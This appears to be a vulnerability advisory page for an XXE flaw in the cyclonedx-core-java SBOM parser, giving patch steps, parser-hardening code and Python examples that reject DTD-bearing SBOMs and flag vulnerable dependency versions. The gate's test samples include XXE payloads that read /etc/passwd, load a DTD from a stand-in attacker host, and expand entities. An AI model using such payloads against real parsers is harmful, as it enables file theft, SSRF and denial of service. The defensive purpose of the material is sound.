CVE-2024-38374
📋 TL;DR
This vulnerability allows XML External Entity (XXE) injection when CycloneDX SBOMs in XML format are parsed. It affects applications that use a vulnerable version of the cyclonedx-core-java library (before 9.0.4) to parse untrusted SBOMs. An attacker who can get a crafted SBOM accepted could read files the parsing process can access, make the server issue requests on their behalf (SSRF), or cause a denial of service.
💻 Affected Systems
- cyclonedx-core-java
⚠️ Manual Verification Required
The NVD entry for this CVE carries no version ranges (no CPE data), so scanners keyed off NVD alone may not flag affected builds automatically.
The vendor advisory (GHSA-683x-4444-jxh8) does state the affected range: cyclonedx-core-java before 9.0.4 is vulnerable and 9.0.4 is the fix. Confirm the version actually on your classpath, including transitive pulls, rather than relying on a scanner.
- Review the CVE details at NVD
- Check vendor security advisories for your specific version
- Test if the vulnerability is exploitable in your environment
- Update to 9.0.4 or later; with no NVD version data, a scanner's silence is not evidence that you are unaffected
⚠️ Risk & Real-World Impact
Worst Case
Disclosure of any file the parsing process can read (configuration, credentials, private keys), SSRF from the SBOM-processing host into internal networks, or denial of service through entity expansion; leaked credentials can then be used to pivot to other systems.
Likely Case
Unauthorized file read from the server filesystem, potentially exposing sensitive configuration files or credentials.
If Mitigated
Limited impact if XML SBOMs from untrusted sources are rejected, or if every document is checked for a DOCTYPE declaration and refused before it reaches the library.
🎯 Exploit Status
Standard XXE techniques apply; no exploit specific to this library is needed. No authentication is required when the application parses SBOMs from untrusted sources, for example uploads or artifacts pulled from third-party repositories.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 9.0.4
Vendor Advisory: https://github.com/CycloneDX/cyclonedx-core-java/security/advisories/GHSA-683x-4444-jxh8
Restart Required: Yes, in the sense that the fix is a library version change, so the application must be rebuilt and redeployed; there is no runtime setting to flip.
Instructions:
1. Change the cyclonedx-core-java dependency (org.cyclonedx:cyclonedx-core-java) to 9.0.4 or later in pom.xml or build.gradle, and check the resolved dependency tree in case another dependency pulls in an older version transitively.
2. Rebuild and redeploy the application.
🔧 Temporary Workarounds
Disable XML processing
Configure the application to accept SBOMs in JSON format only. XXE is an XML-only issue, so the JSON path does not carry this vulnerability.
Configure DocumentBuilderFactory securely
cyclonedx-core-java's parse methods take the document itself (a file, byte array or stream), not a parser factory, so hardening a DocumentBuilderFactory in your own code does not change how the library parses. Use the hardened factory as a gate instead: parse the untrusted document with it first and hand the bytes to cyclonedx-core-java only if that parse succeeds. With DOCTYPE declarations disallowed, the gate throws on any document carrying a DTD, which every XXE payload needs.
DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
// Primary control: refuse any DTD. XXE needs one, and CycloneDX XML (XSD-validated) never does.
dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
// Defence in depth for parsers that do not honour the feature above.
dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
dbf.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
dbf.setXIncludeAware(false);
dbf.setExpandEntityReferences(false);
// setFeature throws ParserConfigurationException if the parser lacks a feature; fail closed rather than continue with a weaker setup.
// Parse the untrusted bytes with dbf.newDocumentBuilder() first; pass them to cyclonedx-core-java only if that parse throws nothing.
🧯 If You Can't Patch
- Reject any XML SBOM that contains a DOCTYPE declaration before it reaches the parser, and only accept XML SBOMs from sources you control; a valid CycloneDX document never needs a DTD, so the check costs nothing on legitimate input
- Use network segmentation to isolate SBOM processing systems from sensitive data
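The DOCTYPE-rejection gate described under the workarounds and in the list above, as an added example that is not part of this page, of cyclonedx-core-java, or of the vendor advisory. It is written in Python with only the standard library so it runs stand-alone and can sit in an ingestion step in front of the Java service; the hardened DocumentBuilderFactory under the workarounds is the same check in Java. The size cap, the sample documents and the host name attacker.invalid are constructed for illustration; the namespace prefix is the real one every CycloneDX XML schema version uses.

```python
"""DTD-rejecting gate for CycloneDX XML SBOMs (added example; standard library only)."""
import xml.parsers.expat as expat

# Every CycloneDX XML schema version lives under this namespace. CycloneDX is
# XSD-validated and never needs a DTD, so any DOCTYPE is grounds for rejection.
CYCLONEDX_NS_PREFIX = "http://cyclonedx.org/schema/bom/"
MAX_SBOM_BYTES = 32 * 1024 * 1024  # assumption: adjust to your pipeline


class SbomRejected(Exception):
    """Raised inside an expat handler to stop parsing immediately."""


def check_sbom_xml(data: bytes) -> tuple[bool, str]:
    """Return (True, "ok") if data is well-formed, DTD-free XML whose root is a
    CycloneDX <bom>; otherwise (False, reason). expat fetches no external
    resources, and parsing is aborted at the DOCTYPE, before any entity declared
    in it could be referenced or expanded."""
    if len(data) > MAX_SBOM_BYTES:
        return False, f"oversized SBOM ({len(data)} bytes)"

    parser = expat.ParserCreate(namespace_separator=" ")
    seen = {}

    def on_doctype(name, system_id, public_id, has_internal_subset):
        if system_id or public_id:
            kind = "external DTD reference"  # remote DTD / parameter-entity style
        elif has_internal_subset:
            kind = "internal DTD subset"     # classic <!ENTITY x SYSTEM "file:///..."> style
        else:
            kind = "empty DOCTYPE"
        raise SbomRejected(f"DOCTYPE declaration ({kind}) on '{name}'")

    def on_start_element(name, attrs):
        # With namespace_separator=" " the name arrives as "<namespace-uri> <local-name>".
        seen.setdefault("root", name)

    parser.StartDoctypeDeclHandler = on_doctype
    parser.StartElementHandler = on_start_element
    try:
        parser.Parse(data, True)
    except SbomRejected as exc:
        return False, str(exc)
    except expat.ExpatError as exc:
        return False, f"not well-formed XML: {exc}"

    ns, _, local = seen.get("root", "").rpartition(" ")
    if local != "bom" or not ns.startswith(CYCLONEDX_NS_PREFIX):
        return False, f"root element is not a CycloneDX bom: {seen.get('root')!r}"
    return True, "ok"


# Constructed samples (not taken from the advisory or any real SBOM).
BENIGN_SBOM = b"""<?xml version="1.0" encoding="UTF-8"?>
<!-- generated by a build pipeline -->
<bom xmlns="http://cyclonedx.org/schema/bom/1.5" version="1">
  <components><component type="library"><name>example-lib</name><version>1.0.0</version></component></components>
</bom>
"""
XXE_FILE_READ = b"""<?xml version="1.0"?>
<!DOCTYPE bom [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<bom xmlns="http://cyclonedx.org/schema/bom/1.5" version="1">
  <components><component type="library"><name>&xxe;</name></component></components>
</bom>
"""
XXE_REMOTE_DTD = b"""<?xml version="1.0"?>
<!DOCTYPE bom SYSTEM "http://attacker.invalid/evil.dtd">
<bom xmlns="http://cyclonedx.org/schema/bom/1.5" version="1"/>
"""
ENTITY_BOMB = b"""<?xml version="1.0"?>
<!DOCTYPE bom [<!ENTITY a "aaaaaaaaaa"><!ENTITY b "&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;">]>
<bom xmlns="http://cyclonedx.org/schema/bom/1.5" version="1"><components><component type="library"><name>&b;</name></component></components></bom>
"""
NOT_A_BOM = b'<?xml version="1.0"?><manifest/>'
TRUNCATED = b'<bom xmlns="http://cyclonedx.org/schema/bom/1.5" version="1">'


def gate_samples() -> dict[str, tuple[bool, str]]:
    """Run the gate over the constructed samples; only the benign SBOM passes."""
    return {
        "benign": check_sbom_xml(BENIGN_SBOM),
        "xxe_file_read": check_sbom_xml(XXE_FILE_READ),
        "xxe_remote_dtd": check_sbom_xml(XXE_REMOTE_DTD),
        "entity_bomb": check_sbom_xml(ENTITY_BOMB),
        "not_a_bom": check_sbom_xml(NOT_A_BOM),
        "truncated": check_sbom_xml(TRUNCATED),
    }


if __name__ == "__main__":
    for label, (ok, reason) in gate_samples().items():
        print(f"{label:15} {'ACCEPT' if ok else 'REJECT'}  {reason}")
```

The gate never decides by looking for the string "DOCTYPE": it lets a real parser tokenise the prolog, so encoding declarations, byte-order marks and leading comments are handled the way the downstream parser will handle them, and it stops at the first DOCTYPE token, so neither a file-reading entity nor an entity bomb is ever expanded. Only documents that pass are handed to cyclonedx-core-java.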
🔍 How to Verify
Check if Vulnerable:
Inspect the resolved dependency tree, not only the version declared in pom.xml or build.gradle, since cyclonedx-core-java may arrive transitively through another dependency; any occurrence of org.cyclonedx:cyclonedx-core-java below 9.0.4 is affected.
Check Version:
mvn dependency:tree | grep cyclonedx-core-java
gradle dependencies | grep cyclonedx-core-java
Verify Fix Applied:
Verify cyclonedx-core-java version is 9.0.4 or higher in your dependency tree
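The version check above, carried one step further as an added example (not part of this page or of any CycloneDX tooling): it parses the lines that mvn dependency:tree and gradle dependencies print for the artifact, honours Gradle's "-> resolved" conflict-resolution notation, and compares versions numerically so that a version such as 9.0.10 is not mistaken for a vulnerable one by string comparison. The sample tree output is constructed, and the version numbers in it are illustrative, not a claim about which releases exist.

```python
"""Flag cyclonedx-core-java < 9.0.4 in Maven/Gradle dependency-tree output (added example)."""
import re

FIXED_VERSION = (9, 0, 4)

# Matches the artifact in both formats:
#   Maven : org.cyclonedx:cyclonedx-core-java:jar:9.0.3:compile
#   Gradle: org.cyclonedx:cyclonedx-core-java:9.0.3 -> 9.0.4   (conflict resolution)
DEP_RE = re.compile(
    r"org\.cyclonedx:cyclonedx-core-java"
    r"(?::[A-Za-z][\w-]*)*"        # Maven packaging/classifier segments (jar, test-jar, ...)
    r":(\d[\w.-]*)"                # declared version
    r"(?:\s*->\s*(\d[\w.-]*))?"    # Gradle "-> resolved" override, if present
)


def version_key(version: str) -> tuple[int, ...]:
    """Numeric dotted prefix of a version string, padded to three parts.
    '9.0.4' -> (9, 0, 4); '9.1-SNAPSHOT' -> (9, 1, 0)."""
    m = re.match(r"\d+(?:\.\d+)*", version)
    parts = [int(p) for p in m.group(0).split(".")] if m else [0]
    return tuple((parts + [0, 0, 0])[:3])


def scan_dependency_tree(text: str) -> list[dict]:
    """One finding per occurrence: line number, declared and effective version,
    and whether the effective version is below the 9.0.4 fix."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for m in DEP_RE.finditer(line):
            declared, resolved = m.group(1), m.group(2)
            effective = resolved or declared   # Gradle may upgrade a declared version
            findings.append({
                "line": lineno,
                "declared": declared,
                "effective": effective,
                "vulnerable": version_key(effective) < FIXED_VERSION,
            })
    return findings


def is_vulnerable(text: str) -> bool:
    """True if any occurrence resolves to a version below 9.0.4."""
    return any(f["vulnerable"] for f in scan_dependency_tree(text))


# Constructed sample output; version numbers are for illustration only.
MAVEN_TREE = """\
[INFO] com.example:sbom-ingest:jar:1.0.0
[INFO] +- org.cyclonedx:cyclonedx-core-java:jar:9.0.3:compile
[INFO] |  \\- com.fasterxml.jackson.core:jackson-databind:jar:2.17.0:compile
[INFO] \\- org.slf4j:slf4j-api:jar:2.0.13:compile
"""
GRADLE_TREE = """\
compileClasspath - Compile classpath for source set 'main'.
+--- org.cyclonedx:cyclonedx-core-java:9.0.3 -> 9.0.4
|    \\--- com.fasterxml.jackson.core:jackson-databind:2.17.0
\\--- org.slf4j:slf4j-api:2.0.13
"""
# A higher patch number than the fix: naive string comparison would call this vulnerable.
GRADLE_TREE_LATER = "+--- org.cyclonedx:cyclonedx-core-java:9.0.10\n"


if __name__ == "__main__":
    for label, tree in (("maven", MAVEN_TREE), ("gradle", GRADLE_TREE), ("gradle-later", GRADLE_TREE_LATER)):
        print(label, "VULNERABLE" if is_vulnerable(tree) else "ok", scan_dependency_tree(tree))
```

Feed it the real output of either command (for example `mvn dependency:tree | python3 check.py` with a small stdin wrapper) and treat any finding with "vulnerable": True as a build to fix; the Gradle sample shows why the resolved version, not the declared one, is what matters.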
📡 Detection & Monitoring
Log Indicators:
- XML parsing errors with external entity references
- Unexpected file access attempts during SBOM processing
Network Indicators:
- Outbound connections from SBOM processing systems to unexpected destinations
SIEM Query:
source="application_logs" AND ("XXE" OR "external entity" OR "DOCTYPE") AND "cyclonedx"
🔗 References
- https://github.com/CycloneDX/cyclonedx-core-java/pull/434
- https://github.com/CycloneDX/cyclonedx-core-java/pull/434/commits/ab0bc9c530d24f737970dbd0287d1190b129853d
- https://github.com/CycloneDX/cyclonedx-core-java/security/advisories/GHSA-683x-4444-jxh8